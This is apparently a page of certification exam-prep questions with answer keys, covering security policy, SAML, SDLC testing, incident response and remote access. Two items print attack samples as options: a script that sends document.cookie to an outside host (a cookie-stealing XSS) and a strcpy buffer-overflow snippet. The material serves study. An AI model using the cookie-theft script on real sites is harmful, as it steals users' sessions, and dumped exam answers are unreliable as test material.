Ensurepass

QUESTION 11

Company ABC has recently completed the connection of its network to a national high speed private research network. Local businesses in the area are seeking sponsorship from Company ABC to connect to the high speed research network by directly connecting through Company ABC’s network. Company ABC’s Chief Information Officer (CIO) believes that this is an opportunity to increase revenues and visibility for the company, as well as promote research and development in the area.

Which of the following must Company ABC require of its sponsored partners in order to document the technical security requirements of the connection?


A. SLA

B. ISA

C. NDA

D. BPA

                

 

Answer: B

 

 

QUESTION 12

A security analyst at Company A has been trying to convince the Information Security Officer (ISO) to allocate budget towards the purchase of a new intrusion prevention system (IPS) capable of analyzing encrypted web transactions.

Which of the following should the analyst provide to the ISO to support the request? (Select TWO).


A. Emerging threat reports

B. Company attack tends

C. Request for Quote (RFQ)

D. Best practices

E. New technologies report

 

Answer: A,B

 

 

QUESTION 13

The IT department of a pharmaceutical research company is considering whether the company should allow or block access to social media websites during lunch time. The company is considering the possibility of allowing access only through the company’s guest wireless network, which is logically separated from the internal research network. The company prohibits the use of personal devices; therefore, such access will take place from company owned laptops.

Which of the following is the HIGHEST risk to the organization?


A. Employee’s professional reputation

B. Intellectual property confidentiality loss

C. Downloaded viruses on the company laptops

D. Workstation compromise affecting availability

 

Answer: B

                

 

 

QUESTION 14

A security audit has uncovered a lack of security controls with respect to employees’ network account management. Specifically, the audit reveals that employee’s network accounts are not disabled in a timely manner once an employee departs the organization. The company policy states that the network account of an employee should be disabled within eight hours of termination. However, the audit shows that 5% of the accounts were not terminated until three days after a dismissed employee departs. Furthermore, 2% of the accounts are still active.

Which of the following is the BEST course of action that the security officer can take to avoid repeat audit findings?


A. Review the HR termination process and ask the software developers to review the identity management code.

B. Enforce the company policy by conducting monthly account reviews of inactive accounts.

C. Review the termination policy with the company managers to ensure prompt reporting of employee terminations.

D. Update the company policy to account for delays and unforeseen situations in account deactivation.

 

Answer: C

 

 

QUESTION 15

Which of the following is true about an unauthenticated SAMLv2 transaction?


A. The browser asks the SP for a resource. The SP provides the browser with an XHTML format. The browser asks the IdP to validate the user, and then provides the XHTML back to the SP for access.

B. The browser asks the IdP for a resource. The IdP provides the browser with an XHTML format. The browser asks the SP to validate the user, and then provides the XHTML to the IdP for access.

C. The browser asks the IdP to validate the user. The IdP sends an XHTML form to the SP and a cookie to the browser. The browser asks for a resource to the SP, which verifies the cookie and XHTML format for access.

D. The browser asks the SP to validate the user. The SP sends an XHTML form to the IdP. The IdP provides the XHTML form back to the SP, and then the browser asks the SP for a resource.

 

Answer: A

                

 

 

QUESTION 16

A company which manufactures ASICs for use in an IDS wants to ensure that the ASICs’ code is not prone to buffer and integer overflows. The ASIC technology is copyrighted and the confidentiality of the ASIC code design is exceptionally important. The company is required to conduct internal vulnerability testing as well as testing by a third party.

Which of the following should be implemented in the SDLC to achieve these requirements?


A. Regression testing by the manufacturer and integration testing by the third party

B. User acceptance testing by the manufacturer and black box testing by the third party

C. Defect testing by the manufacturer and user acceptance testing by the third party

D. White box unit testing by the manufacturer and black box testing by the third party

 

Answer: D

 

 

QUESTION 17

The security administrator is receiving numerous alerts from the internal IDS of a possible Conficker infection spreading through the network via the Windows file sharing services. Given the size of the company which deploys over 20,000 workstations and 1,000 servers, the security engineer believes that the best course of action is to block the file sharing service across the organization by placing ACLs on the internal routers.

Which of the following should the security administrator do before applying the ACL?


A. Quickly research best practices with respect to stopping Conficker infections and implement the solution.

B. Consult with the rest of the security team and get approval on the solution by all the team members and the team manager.

C. Apply the ACL immediately since this is an emergency that could lead to a widespread data compromise.

D. Call an emergency change management meeting to ensure the ACL will not impact core business functions.

 

Answer: D

 

 

QUESTION 18

 A company currently does not use any type of authentication or authorization service for remote access. The new security policy states that all remote access must be locked down to only authorized personnel. The policy also dictates that only authorized external networks will be

allowed to access certain internal resources.

Which of the following would MOST likely need to be implemented and configured on the company’s perimeter network to comply with the new security policy? (Select TWO).


A. VPN concentrator

B. Firewall

C. Proxy server

D. WAP

E. Layer 2 switch

 

Answer: A,B

 

 

QUESTION 19

Which of the following displays an example of a buffer overflow attack?


A. <SCRIPT>

document.location=’http://site.comptia/cgi-bin/script.cgi?’+document.cookie

</SCRIPT>

B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb

C. #include

char *code = “AAAABBBBCCCCDDD”; //including the character ‘’ size = 16 bytes void main()

{char buf[8]; strcpy(buf, code);

}

D. <form action=”/cgi-bin/login” method=post> Username:<input type=text name=username> Password:<input type=password name=password>

<input type=submit value=Login>

 

Answer: C

                

 

 

QUESTION 20

Which of the following displays an example of a XSS attack?


A. <SCRIPT>

document.location=’http://site.comptia/cgi-bin/script.cgi?’+document.cookie

</SCRIPT>

B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb

C. <form action=”/cgi-bin/login” method=post> Username:<input type=text name=username> Password:<input type=password name=password>

<input type=submit value=Login>

D. #include

char *code = “AAAABBBBCCCCDDD”; //including the character ‘’ size = 16 bytes void main()

{char buf[8]; strcpy(buf, code);

}

 

Answer: A

 

 

Comments are closed.